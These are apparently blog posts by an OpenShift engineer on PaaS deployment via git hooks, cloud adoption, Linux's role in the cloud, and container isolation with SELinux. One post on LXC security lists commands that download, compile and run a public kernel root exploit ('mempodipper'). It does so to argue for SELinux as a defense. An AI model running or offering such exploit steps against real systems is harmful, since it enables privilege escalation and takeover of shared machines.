Building an Open Source PaaS Deployment Model

To some, cloud is an excuse to introduce “black box” processes that lock users into their services.  But they can’t really come right out and say that.  Instead they distract from their approach with fanciful names and tell us that the cloud is full of magic and wonder that we don’t need to understand.  This type of innovation is exciting to some, but to me, combining innovation with a lock-in approach is depressing.  In the past, we’ve seen it at the operating system level and the hypervisor level.  We’ve also seen open source disrupt lock-in at both levels and we are going to see the same thing happen in the cloud.

When we started designing and building OpenShift, we wanted to provide more than just a good experience that, in turn, locked end users in to our service.  One of the early design decisions we made on OpenShift was to utilize standards as much as we could and to make interactions transparent at all levels.  We did want the user experience to be magical, but also completely accessible to those who wanted to dig in.  To demonstrate this, let's walk through the deployment process in OpenShift, arguably the most magical part of the entire offering…

As we were designing a PaaS service focused on developers, our first goal was to make the deployment process as natural as possible for them.  For most developers, the day-to-day process goes something like code, code, code, commit.  For those already questioning this process, let me speak on behalf of the developer in question by saying

Tests?! Of course I’ve already written the tests!  They were in the third ‘code’!

Anyway, we wanted to plug into that process and to do that we chose git.  The reason for selecting git over more centralized source code management tools like subversion was that the distributed nature of git allowed the user to have full control over their data.  The user always had access to their entire historical repository and as developers, we thought that was a critical requirement.  Given that, we standardized on git as the main link between our users’ code and OpenShift.

Now let’s look at what that development process might look like in practice.  First, you start off with the code, code, commit part:

vi 
# make earth shattering changes
git commit -a -m "My earth shattering comment"

The next part of the process for those familiar with git is the publish process.  You run a ‘push’ command to move your code from your local repository to your distributed clones.  So when you run:

git push

Your code is transferred to OpenShift and automatically deployed to your environment.  Whether code needs to be compiled, tests need to be run, dependencies need to be downloaded, or a specific packaging spec needs to be built, it all happens on the server side with this one command.  To do this we utilize a git hook to kick off the deployment process.  Wait, I know what you are thinking…

What?!  Just a git hook?!  This is the cloud baby!  Shouldn’t this be custom compiling my code into a Zeus Hammer to perform a magical Cloud Nuclear transfer?!!

If you ask us, a git hook works just fine because it's what you would probably do yourself.  We simply use a standard server-side git hook to kick off the deployment.  That script invokes a series of scripts (called hooks) representing the various steps in the deployment process.  Some of the hooks are provided by the cartridge that your application is using and some are provided by the application itself.  This approach lets the cartridge provide base functionality that can be further customized by the application.
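
To make that concrete, here is a rough sketch of what a server-side hook along these lines might look like.  The paths, the CART_HOOKS location and the helper scripts are illustrative assumptions, not the actual OpenShift implementation:

#!/bin/bash
# a simplified, hypothetical post-receive style hook -- not the actual OpenShift script
set -e

APP_DIR=$HOME/app-root                      # assumed location of the deployed application
CART_HOOKS=$HOME/cartridge/hooks            # assumed location of the cartridge's hook scripts

GIT_WORK_TREE=$APP_DIR git checkout -f      # check out the code that was just pushed

"$CART_HOOKS/build"                         # cartridge step, e.g. Maven or Bundler

if [ -x "$APP_DIR/.openshift/action_hooks/deploy" ]; then
    "$APP_DIR/.openshift/action_hooks/deploy"   # application-provided step, if present
fi

"$CART_HOOKS/start"                         # restart the application with the new code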

First let's talk about the cartridge hooks.  Having cartridge-specific hooks is important because each cartridge needs to do different things in its deployment process.  For example, when a Java cartridge detects a deployment, we want to do a Maven build, but when a Ruby cartridge detects a deployment, it should execute Bundler.  The cool part is that each individual cartridge can override anything it needs to in the default process.

Let's look at how the Ruby cartridge implements this.  The ruby-1.9 cartridge overrides the build hook to run Bundler, while the Java cartridge leverages Maven in its build hook.  You can implement the pieces that are right for your cartridge where it makes sense and still utilize the generic process everywhere else.  In isolation, each individual script is really quite simple.  In aggregate though, all those extensions become extremely powerful and do much of the heavy lifting on behalf of the users.
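
To give a feel for it, here is roughly what a Ruby cartridge's build hook boils down to.  This is an illustration of the idea rather than the actual cartridge source, and OPENSHIFT_REPO_DIR is assumed to point at the checked-out application code:

#!/bin/bash
# illustrative Ruby cartridge build hook -- run Bundler if the application uses it
cd "$OPENSHIFT_REPO_DIR"

if [ -f Gemfile ]; then
    bundle install --deployment    # resolve and vendor the application's gem dependencies
fi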

But what if you want to change the default behavior for a specific application?  No problem!  You have a collection of application-level action hooks, found in your application under ~/.openshift/action_hooks.  You could put your own code in pre_build, build, deploy, post_deploy or wherever else it makes sense, and these scripts are invoked just like the cartridge hooks as part of the deployment process.  What you choose to do with them is your decision.  Put some code in them and they will get called at each step in the deployment process.  This lets you not only leverage the power of a customized cartridge, but also tweak and tune so things are just right for your application.
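
As a minimal, hypothetical example, a deploy action hook for a Rails-style application might do nothing more than run database migrations before the application comes back up:

#!/bin/bash
# hypothetical .openshift/action_hooks/deploy -- runs after the build, before the application restarts
# (remember to make the script executable with chmod +x)

echo "Running database migrations..."
cd "$OPENSHIFT_REPO_DIR"           # assumed to point at the checked-out application code
bundle exec rake db:migrate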

At the end of the day, harnessing the power of the cloud doesn't need to lock you into a vendor.  At OpenShift, we believe that transparency, standards and extensibility make for a process that stands the test of time.  I hope this has provided some visibility into how the OpenShift deployment model works and given you some insight into navigating the codebase.  And if this has piqued your interest and you find yourself digging through more and more code, please reach out and get involved.

IT Cloud Myths around Dynamic Demand (or the lack thereof….)

Today I read a great article that compared the adoption of cloud in IT to the adoption of open source.  In a nutshell, cloud is being resisted by IT groups much like open source used to be resisted.  Given my role on OpenShift and having been at Red Hat for several years, I’ve seen both forms of this resistance in the field.  In this post, I’ll try and debunk one of the most common IT dismissals of utilizing cloud:

I don’t have dynamic demand – cloud won’t help me

That is a tricky defense tactic because many people in IT believe it to be true.  To dispel this myth, I find it best to break demand into external and internal demand.

It is fairly easy to tell whether your company has dynamic external demand.  That usually boils down to whether or not you have seasonal demand (e.g. retail sites and Black Friday) or event-driven demand (e.g. a Super Bowl ad).  Companies with seasonal or spiky production demand have an obvious use case for the elasticity of cloud, but that is only half the story.

However, while relatively few companies have dynamic external demand, the vast majority of IT shops have an unrecognized source of dynamic demand internally: their own consumers and development teams.  But when first asked, they often believe this not to be the case.  The conversation usually goes this way:

Question: Are you giving your users all the resources they think they need?

Answer: No.  They always ask for more than they need and we don’t have the capacity.  The initial requests just aren’t reasonable.

Question: Is the process for getting resources easy or self-service or does it require a ton of justification and cost?

Answer: We have to make the process tough.  If we gave users what they asked for, we’d go broke!

Question: Do your users ever give back unused resources or do they try and hold on to them forever?

Answer: That’s just it – they never give anything back!  They would keep it forever if we didn’t watch them like hawks and claw it all back…

At that point, this is the question that often makes them re-think their initial assumption about not having dynamic demand internally:

Question: If you gave users everything they wanted and were able to recoup those resources when they weren’t used, would you have dynamic demand?

Answer: (long pause) Yeah…. I guess we would.  (long pause) Haven’t thought about it that way before…

I’ve had this same conversation play out time and time again.  Most of the guys on the IT side aren’t knowingly being malicious, but they have built a protective system over the course of years and have lost sight of what their users actually need.  They think that they are protecting users from themselves whereas in reality, they are eliminating themselves as a credible service provider.  Under-served users will just go directly to the public cloud providers and work around IT entirely.  This has been happening with SaaS offerings such as Salesforce.com for years and the behavior will be no different with public cloud providers.

IT organizations that embrace these changes are more likely to end up being a strategic partner with their users.  By leveraging cloud technologies instead of rejecting them, they can revolutionize the way they provide compute resources to their users and combine that with the valuable corporate data they already have.  Having worked in IT, I think this is the underlying desire of many IT shops.  Unfortunately, the processes they have built for themselves often work against that desire without them even knowing it.  Those that survive will need to change, and change fast, to maintain relevance.

Are LXC containers enough?

First off, let me state that I think the LXC project is great.  In previous blog posts, I've talked about segmenting existing virtual machines to securely run multiple workloads and achieve better flexibility, lower cost, and so on.  This concept is often referred to as 'Linux Containers' and creating these containers with the LXC project is a very popular approach.  LXC aggregates a collection of other technologies such as Linux Control Groups, Kernel Namespaces, Bind Mounts and others to accomplish this in an easy way.  Good stuff.  The question, however, is whether LXC alone is enough to give you confidence in your approach to utilizing Linux containers.
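
If you want to see those building blocks without LXC's tooling, you can carve out a few namespaces by hand with util-linux's unshare command (run as root).  This is just a peek at the raw ingredients, not a full container:

unshare --fork --pid --mount --uts /bin/bash   # new PID, mount and hostname namespaces
mount -t proc proc /proc                       # remount /proc so ps only sees this namespace
hostname sandbox                               # the hostname change is invisible to the host
ps -ef                                         # only the new shell and ps are listed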

In the words of Dan Berrange:

Repeat after me “LXC is not yet secure. [. . .]”

In other words, no, it's not enough.  The main problem right now is that LXC doesn't have any inherent protection against exploits that allow a user to become root.  In the world of Linux, traditionally if you have root you can do anything.  When using containers, that means that if one container can find a way to become root on the machine, it can do whatever it wants with all the other containers on the box.  I think the official term for that situation in IT is a 'cluster'.  While the concept of capabilities is being introduced into the kernel to help segment the abilities that root actually has, that is a long way from being a realistic defense, especially on the production systems deployed today.

How realistic are these exploits, though?  To many, the concept of a kernel or security exploit is something they would rather believe just doesn’t actually happen.  Maybe they prefer to think that it’s limited to the realm of academic discussions.  Or maybe they just believe it’s not going to happen to them.

Unfortunately, the reality is quite different.  While I agree that finding an exploit requires an amazing amount of knowledge and creativity, using an exploit for malicious purposes isn't that challenging.  For example, let's look at the excellent article written by Jason A. Donenfeld about a kernel exploit that is able to achieve root access.  Jason explains how this exploit works in amazing detail here: http://blog.zx2c4.com/749.  Believe me, discovering that and writing that article was a LOT of work.  But now, let's look at how easy it is to use that exploit on unpatched kernels:

  • Download the provided C program (e.g. wget http://bit.ly/wELTpn)
  • Compile it (gcc mempodipper.c -o mempodipper)
  • Run it and get root access (./mempodipper)

Pretty scary huh?  Three steps and I could get root on your machine.  I can hear the sighs of relief already though, as people start thinking:

I don't have to worry about this since I don't let people run arbitrary code on my machines…

Let’s discuss that train of thought for a minute.  First, let’s approach this from the perspective of a Platform as a Service (PaaS).  A PaaS essentially allows users to run their own code on machines shared by many.  That means experimenting with an exploit like this in a PaaS environment isn’t very difficult at all.  And remember, if any user can get root on that system, they own all the applications on it.

Not consuming or hosting a PaaS?  Well, I’ve spent many years in IT shops and the traditional IT deployments for large companies don’t look all too different.  Granted, the code is usually coming from employees and contractors, but you still probably don’t want to risk root exposures by anyone that is able to deploy a change into your environment.

Well if LXC doesn’t protect against this and my traditional environments are susceptible as well, is there any hope at all?!?!  Thankfully, there is.

The solution is using SELinux in combination with whatever container technologies you are using.  With an SELinux policy, you are essentially able to control the operations of any running process, regardless of which user it happens to be running as.  SELinux provides a layer of protection against root itself, where most other security mechanisms fail.  When a user is running in an SELinux context on a system and tries an exploit like the one above, you have an extra line of defense.  It's easy to establish a confined environment that limits riskier operations like setuid-related syscalls and restricts memory access, which in turn would stop this exploit and others.  Most importantly, you get consistent protection across every process, no matter what user it is running as.
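
If you want to see that layer in action on a Fedora or RHEL style system, a few commands tell the story (the httpd domain here is just an example; names will vary with your policy):

getenforce                      # is SELinux actually enforcing its policy?
ps -eZ | grep httpd             # every process runs in a labeled, policy-constrained context
ausearch -m avc -ts recent      # recent denials show the policy stepping in (needs auditd)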

You can think of SELinux as a whitelisting approach instead of blacklisting.  The traditional model of security (often referred to as Discretionary Access Control or DAC) requires protecting against anything a user should not be able to do.  Given the complexity of systems today, that’s becoming unrealistic for mere mortals.  The SELinux model of security (often referred to as Mandatory Access Control or MAC) requires enabling everything a user should be able to do.
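
That whitelist is expressed through labels: every process and every file carries an SELinux context, and the policy decides which contexts are allowed to interact.  For example:

id -Z                 # the SELinux context your own shell is running in
ls -Z /var/www/html   # the labels on files, which the policy checks against that context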

While it's not a silver bullet, it's an elegant mitigation in many areas.  Many types of IT hosting are becoming increasingly standardized and you can put in place fairly simple policies that specify what users should be able to do.  For web applications, you are going to allow binding to HTTP / HTTPS ports.  You are probably going to allow JDBC connections.  You can describe the allowed behaviors of many of your applications in a fairly concise way.  Thinking of security this way mitigates many of the exploits that take a creative path like the one above (setuid access, /proc file descriptor access, and memory manipulation).  Unless you have a pretty special web application, it's safe to say it shouldn't be doing that stuff :)
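
On a Fedora or RHEL style targeted policy, those allowances often come down to a couple of well-known knobs.  As an illustration (double-check the boolean and type names on your own system):

setsebool -P httpd_can_network_connect_db on    # let the web server open outbound database connections
semanage port -a -t http_port_t -p tcp 8081     # label a non-standard port so Apache may bind to it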

Interested in learning more?  The place I recommend starting is the Fedora documentation.  Fedora and RHEL have some of the best SELinux policies and support in the industry.  The documentation covers everything from learning SELinux to debugging it.  Most importantly though, don't get fooled into thinking all Linux distributions are the same.  While SELinux support is in the kernel, what really matters is the ecosystem of policies that exists around it.  In Fedora or RHEL, you get whitelists ready-made for a slew of well-known systems like Apache.  In many other distros, you'd spend your time recreating that work for the standard systems and never have any time to focus on your application policies.  That's probably not the best use of your time, and it would be a daunting first experience with SELinux to say the least.
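
A quick way to appreciate how much of that work is already done for you is to look at what ships in the box:

semodule -l | wc -l             # how many policy modules come with the distribution
getsebool -a | grep httpd       # the tunable booleans already defined for Apache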

My last disclaimer is that, as powerful as SELinux is, I wouldn't recommend putting all your eggs in one basket when it comes to security.  Combine SELinux with other security measures and maintain traditional operational best practices to minimize your exposure (e.g. apply security updates, audit, etc.).  In other words, use it as an enhancement to what you do today, not a replacement.

Well, if you’ve made it this far, I’ll assume you are a convert: Welcome to the world of SELinux and sleeping a little better at night!

Red Hat Summit Recap – 2012

Last month we had our annual Red Hat Summit.  I always look forward to Summit because it gives me a chance to connect with users and customers in a way I don't get on a daily basis.  I try to spend as much time as I can with them, both to understand their current needs and to deduce some trends for the upcoming year.  Here are my conclusions from the 2012 Summit:

1. IT shops are moving beyond basic virtualization (finally!)

Now, this is probably a bit skewed since I'm an OpenShift guy and tend to be asked a lot of PaaS / IaaS / Cloud questions, but there was something different this year.  The questions I was being asked had enough depth that it wasn't just casual prodding about things to expect with 'cloud', but questions from customers that had been through designs and experimentation themselves.  This was an exciting change for me because it means that IT shops are becoming comfortable enough with core capabilities like virtualization and provisioning to pursue more.  Private cloud and IaaS capabilities are maturing quite a bit and there were a lot of questions on usage and expectations on all fronts.  The big issue everyone was bumping up against with the public cloud was data locality and regulations.  I think that is going to be a challenge for years to come, but luckily private cloud solutions are getting more robust, which will let IT shops in that predicament still compete.  In fact, Red Hat announced our Enterprise PaaS offering, which includes offerings installable in customer data centers.  I think being able to bridge the private and public cloud is going to be a key requirement for any vendor looking to compete in this space.

2. SELinux is getting more popular with cloud deployments

I'm not used to being asked SELinux questions at all, really.  Heck, I'm usually the guy promoting it at conferences and educating people on it.  So by the third or fourth time an SELinux conversation came up, I had to wonder what was changing.  My conclusion is that, as with most things cloud, achieving maximum density and cost effectiveness is usually a primary goal.  However, in many cases, extreme density comes at the cost of security.  Given the number of security exposures that have made big headlines recently, it appears that a refocusing on the security side of solutions is occurring.  It also appears that people are starting to realize that SELinux provides a very elegant way to avoid having to make this compromise.  SELinux provides a layer of security in the kernel that allows you to securely segment filesystem and process interactions (among other things).  This allows you to run a variety of workloads on the same machines, using and overcommitting the underlying resources as necessary without giving up the ability to segment those applications.  Segmentation used to be something only attempted at a virtual machine or physical machine level.  That is no longer the case.  On OpenShift we've been a fan of this approach for a long time and it's worked extremely well.  Glad that others are looking at the same model.

3. Developer efficiency is becoming a focus of IT shops

Okay, this one is definitely biased since I'm a PaaS guy.  That said, before I was a PaaS guy, I was an IT guy.  I worked on both the development and the operational side of the house for several years.  One of the things I learned about operations is that it traditionally cares more about the running system than the development process.  The opposite was true for development: they often ignore the complexities of keeping their code running and focus on cutting new code.  However, as operations generally controls much of the IT budget, it was always a struggle to actually make the development side of the house productive.  In 2009, the idea of a DevOps model was introduced to bring both sides of IT closer together, and harmony would ensue…  Why then has it taken until 2012 for this to start to take hold?  I think a very strong catalyst was needed to force a change in the existing behavior.  And these days, there are quite a few catalysts forcing change in many companies: the public cloud, the economy and startup competition.  For the first time in a while, I was talking with customers that were legitimately trying to bring their development and operational processes together.  In some cases, it was an operational change driven by the transparency of public cloud pricing and the realization that if they couldn't compete, developers could get services elsewhere.  In some cases it was economic pressure pushing companies to do more with less.  And in other cases, it was the realization of what some very small companies have been able to achieve just using cloud-based services.  Whatever the motivation, companies are re-invigorated to compete and ready to change to make that happen.  I love seeing that and I think these companies will be the ones that push the boundaries of PaaS offerings and help that space continue to evolve.

Will Linux be Relevant in the Cloud?

Those that know me probably know where this is going.  However, for those of you that do not know me, I’ll state my stance up front:

I do not understand the logic behind the argument that the operating system will become less relevant in the cloud.  That is a fallacy.

I realize that this is a popular messaging approach for some vendors that have a minimal stake or understanding of the operating system.  However, please don’t get pulled into that marketing machine.  Let’s try and look at this from a more practical standpoint.  I often hear this reasoning brought up in the following context:

  • You don’t care what operating system you are running in the cloud.  You only have to care about your application.

I spend my days building a Platform as a Service (PaaS) offering (aka OpenShift), so I'm particularly sensitive to this argument.  While I agree that our goal on OpenShift is to make the developer experience as simple as possible, everything beyond the initial registration experience today is going to have you interacting with the operating system at some level.  Beyond your personal machine setup, technologies like SSH are heavily used in PaaS offerings.  In addition to being the backbone of mundane functions like supporting authentication and providing the underlying protocol for git transfers, SSH is also often used directly by developers to support use cases like debugging.  When your applications are running on remote machines, being able to port forward, attach local debuggers and poke and prod from your laptop is critical.  Technologies in Linux like SSH make that possible.
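
As a simple example, forwarding a local port over SSH to a debugger or database listening inside your remote instance looks the same as it would against any Linux box (the user and host names here are hypothetical):

ssh -L 5858:127.0.0.1:5858 appuser@myapp-mydomain.example.com   # hypothetical user and host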

Okay, so maybe SSH is important, but what other aspects of the operating system should you have to care about?  I guess that is where the disconnect is to me.  A PaaS, or any cloud service, should support and allow you to leverage common tools and standards to the greatest extent possible.  Why?  Because a lot of people already know them and it makes those users more productive.  Why on earth would your users want to go re-implement everything to your standard?  If you love rsync and want to use rsync over SSH, it should just work.  If you want to schedule something on your PaaS application, you should be able to use cron.  If you want to shell out and script something from your PaaS instance, you should be able to run a Bash / Perl script and have all the standard tools just work.
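
In practice, that means commands like these should work against your PaaS instance just as they would against any other Linux machine (the user, host and paths here are hypothetical):

rsync -avz -e ssh ./assets/ appuser@myapp.example.com:~/app-root/data/   # sync files over SSH

echo '0 2 * * * $HOME/scripts/cleanup.sh' | crontab -   # schedule a nightly job (replaces the current crontab)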

Now, don’t get me wrong, I don’t think you should be forced to use this stuff but it should be there as an option.  Why?  Because the tools that have worked in Linux for decades still work extremely well.  Maybe better tools will be written in Ruby or Python for your use case and I would encourage you to use them if that is the case.  Experimentation is critical, but it’s usually most productive if you are building on a stable base.  In the cloud, just like in the data center, that base is Linux.

So far, I've really only focused on the end user experience and hopefully it's apparent that even casual cloud users are still going to interact with the operating system regularly.  Now, if the end users of cloud services are still going to be exposed to the operating system, imagine the people that are building those services!  At the end of the day, your competitive edge will be knowing the operating system so that you don't waste time rebuilding things that already exist.  On OpenShift, for example, we use bleeding-edge operating system functionality such as Linux control groups and filesystem polyinstantiation to help provide workload management and segment users.  We could have built something to do that, but if there is already a robust solution in the operating system, why build something new?  We use SELinux for security because trying to build a rock-solid security layer outside of the kernel is practically impossible.  We use quota for managing filesystem allocations, the kernel's traffic control facilities for managing network bandwidth, PAM for authentication support, and the list goes on and on.  Using the functionality that exists in Linux allows us to focus on our goal of making the developer experience in the cloud easier.  We get to focus on challenges that the operating system does not solve, like automatically scaling your applications.  Our understanding of Linux allows us to not waste time reinventing the wheel.
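
To make that concrete, here is the flavor of what managing workloads with those facilities looks like.  This is a hedged sketch with illustrative names and limits, not OpenShift's actual configuration:

cgcreate -g memory:/gear123                                             # create a control group for one tenant
echo 536870912 > /sys/fs/cgroup/memory/gear123/memory.limit_in_bytes   # cap it at 512 MB of memory

setquota -u gearuser 1048576 1572864 40000 50000 /var/lib/openshift    # block and inode quotas for the same tenant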

I'm not completely unreasonable.  I do agree that the cloud will affect how you use Linux to some extent.  The hardware layer is being abstracted to a large degree.  That means you will probably spend more time using networking technologies like SSH than you will messing with SAN configurations.  The toolset you use from day to day will shift, but it will be a slight shift, not a replacement.  At the end of the day, the operating system will still be a critical tool in your toolbox.  And in the cloud, that operating system is Linux.

What PaaS means to virtualization

Over the next few years, we expect to see a tremendous focus on technologies that help isolate applications and workloads within a virtual machine. This is a bit of a controversial topic because in the minds of many, that is exactly what virtualization is geared to do. Now don't get me wrong, I'm a huge fan of virtualization, but I think it's merely one weapon in the battle to increase efficiency and utilization, not a silver bullet. I also believe that the next battle for efficiency and utilization is going to occur in the Platform as a Service (PaaS) space. Achieving the highest levels of efficiency yourself is a challenging undertaking, but consuming these new tools via a PaaS is easier. In this post I'm going to try to demystify what is going on under the hood of the best PaaS offerings out there.

First let’s take a look at the past to make sure we all start on the same page. In the olden days (i.e. pre Y2K), the most common situation was to have a single piece of hardware, that ran a single operating system and a single application. Given the commodity hardware on the market, this worked really well. In most companies, when you wanted a new application deployed, you bought a new piece of hardware and installed that application on it. Pretty simple.

In the following years though, things started changing. First, more companies started depending on IT for a competitive edge. This drove more investment into IT, but also more scrutiny of how IT was spending its money. Improving the utilization of your machines became a pretty hot topic. At the same time, hardware was improving at a ridiculous pace. The model of installing a single application per physical piece of hardware was getting wasteful. More often than not, this approach wasn't even using 10% of the hardware's capabilities. Whether you were a Silicon Valley startup or a Fortune 100 company, you didn't want 90% of your investment just sitting there.

Then virtualization entered the equation. Virtualization allowed a complete abstraction between the operating system and the actual hardware it was running on. This allowed a single piece of hardware to run lots of operating system instances. Without changing any of their applications, companies could now take racks of machines and consolidate them all onto a single piece of hardware. Hardware that once sat lonely and idle, barely waking up to process requests, was now sweating under the load.

These days though, virtualization is commonplace. Virtualized infrastructures are no longer a differentiator, they are an expectation. And with Infrastructure as a Service providers (IaaS), you can get virtual machines in seconds, with impressive pricing. Now that everyone has access to this technology and anyone can achieve that first big jump in utilization, what is going to separate you from the pack?

What is going to make you stand out is your understanding of how to squeeze every drop of performance out of each virtual machine. If you are still running a single virtual machine for every application in your environment, you might be achieving great utilization (i.e. your machines are sweating like crazy) but you are probably wasting a lot more than you should. This approach was required at first because the tooling to properly segment lots of different applications on a single machine just wasn’t there. That’s not the case anymore. With the advances in Linux with technologies like Security Enhanced Linux (SELinux), Kernel Namespaces and Linux Control Groups, it’s time to re-evaluate how we are doing stuff.

So how does all this relate to Platform as a Service (PaaS)? Just like IaaS offerings made virtualization available to everyone, the vast majority of users are going to harness these new levels of efficiency through Platform as a Service (PaaS) offerings. PaaS offerings, like Red Hat's OpenShift PaaS, are built on top of virtualization and exist to make both developers and operations more productive.

While I can't speak for all the PaaS offerings out there, I can say that OpenShift exists to tweak and tune everything it can to make each virtual machine as effective as possible. At the same time, we strive to make all those gory details invisible to developers. Since we are built on an open source technology stack, the ability to do it yourself is there, and I would encourage you to check out OpenShift Origin and get engaged if you are interested in the technology that is going to make virtualization even more powerful.